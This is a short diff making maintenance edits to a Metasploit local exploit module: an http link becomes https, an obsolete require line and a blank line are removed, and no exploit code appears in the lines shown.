@@ -1,11 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Local
   # It needs 3 minutes wait time
   # WfsDelay set to 180, so it should be a Manual exploit,
@@ -95,5 +92,4 @@ class MetasploitModule < Msf::Exploit::Local
     register_file_for_cleanup(dummy_filename)
     register_file_for_cleanup(filename)
   end
-
 end
